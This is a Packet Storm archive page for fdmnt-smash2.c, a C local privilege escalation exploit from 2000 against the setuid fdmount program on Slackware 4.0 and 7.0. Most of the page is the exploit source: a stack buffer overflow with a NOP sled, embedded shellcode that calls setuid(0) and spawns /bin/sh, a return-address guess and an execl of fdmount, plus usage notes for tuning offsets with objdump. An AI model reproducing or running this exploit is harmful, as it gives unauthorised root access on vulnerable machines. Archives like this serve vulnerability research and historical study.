exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

fdmnt-smash2.c

fdmnt-smash2.c
Posted May 17, 2000
Authored by Scrippie | Site b0f.freebsd.lublin.pl

fdmount local root exploit - tested on Slackware 4.0. Must be in the floppy group. Modified from last version to work on Slackware 7.

tags | exploit, local, root
systems | linux, slackware
SHA-256 | 255ecb2ad7fe3f717a036f24b6eb2b7864a4ac3e503bf58f697e951d039c3d6b

fdmnt-smash2.c

Change Mirror Download
/*
Welcome dear reader - be it scriptkiddy, whose sole intent it is to
destroy precious old Unix boxes or Assembly Wizard whose sole intent it
is to correct my code and send me a flame.

The fdutils package contains a setuid root file that is used by the floppy
group to mount and unmount floppies. If you are not in this group, this
exploit will not work.

This thingy was tested on Slackware 4.0 and 7.0

Use as: fdmount-exp [offset] [buf size] [valid text ptr]

Since the char * text is overwritten in void errmsg(char *text) we should
make sure that this points to a valid address (something in the .data
section should do perfectly). The hard coded one used works on my box,
to find the one you need use something like:

objdump --disassemble-all $(whereis -b fdmount) | grep \<.data\> \
cut -d " " -f1

The HUGE number of nops is needed to make sure this exploit works.
Since it Segfaults out of existence without removing /etc/mtab~ we
only get one try...

Take care with your newly aquired EUID 0!

Cheers go out to: #phreak.nl #b0f #hit2000 #root66
The year 2000 scriptkiddie award goed to: Gerrie Mansur
Love goes out to: Hester, Maja (you're so cute!), Dopey

-- Yours truly,
Scrippie - ronald@grafix.nl - buffer0verfl0w security
- #phreak.nl
*/

#include <stdio.h>

#define NUM_NOPS 500

// Gee, Aleph1 his shellcode is back once more

char shellcode[] =
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}

main(int argc, char **argv)
{
int buf_size = 71;
int offset=0, i;

char *overflow;
char *ovoff;
long addr, ptr=0x0804c7d0;

if(argc>1) offset = atoi(argv[1]);
if(argc>2) buf_size = atoi(argv[2]);
if(argc>3) ptr = strtol(argv[3], (char **) NULL, 16);

printf("##############################################\n");
printf("# fdmount Slack 4/7 exploit - by Scrippie #\n");
printf("##############################################\n");
printf("Using offset: %d\n", offset);
printf("Using buffer size: %d\n", buf_size);
printf("Using 0x%x for \"void errmsg(char *text,...)\" char *text\n", ptr);

if(!(overflow = (char *)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) {
fprintf(stderr, "Outta memory - barging out\n");
exit(-1);
}

overflow[0] = '/';

for(i=1;i<buf_size;i++) {
overflow[i] = 0x90;
}

addr = get_sp() - offset;

printf("Resulting address: 0x%x\n", addr);

memcpy(overflow + strlen(overflow), (void *) &addr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);

ovoff = overflow + strlen(overflow);

for(i=0;i<NUM_NOPS;i++) {
*ovoff = 0x90;
*ovoff++;
}

strcpy(ovoff, shellcode);

execl("/usr/bin/fdmount", "fdmount", "fd0", overflow, NULL);

return 0;
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close